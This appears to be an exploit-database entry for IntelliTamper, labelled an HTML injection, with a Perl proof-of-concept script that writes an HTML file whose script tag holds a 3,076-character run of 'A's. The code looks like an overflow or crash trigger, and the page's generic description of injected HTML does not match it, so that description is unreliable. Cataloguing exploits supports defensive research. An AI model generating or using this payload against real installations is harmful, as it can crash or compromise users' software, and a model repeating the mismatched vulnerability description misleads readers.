header-logo
Suggest Exploit
vendor:
N/A
by:
SkuLL-HackeR
8,8
CVSS
HIGH
HTML Injection
79
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

IntelliTamper HTML Injection Vulnerability

This vulnerability allows an attacker to inject malicious HTML code into a vulnerable web page. The vulnerability is caused by insufficient input validation of user-supplied data. An attacker can exploit this vulnerability by sending a specially crafted request containing malicious HTML code to the vulnerable web page. This code will be executed in the context of the vulnerable web page, allowing the attacker to gain access to sensitive information or perform malicious actions.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious HTML code.
Source

Exploit-DB raw data:

# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
# usage : perl xpl.pl >>xpl.html
my $IntelliTamper_html ='<html><head><title>SkuLL-HackeR Home
World</title></head><body>' .
'<script defer="' .
"\x41" x 3076 .
'">' .
"</body></html>";
print $IntelliTamper_html;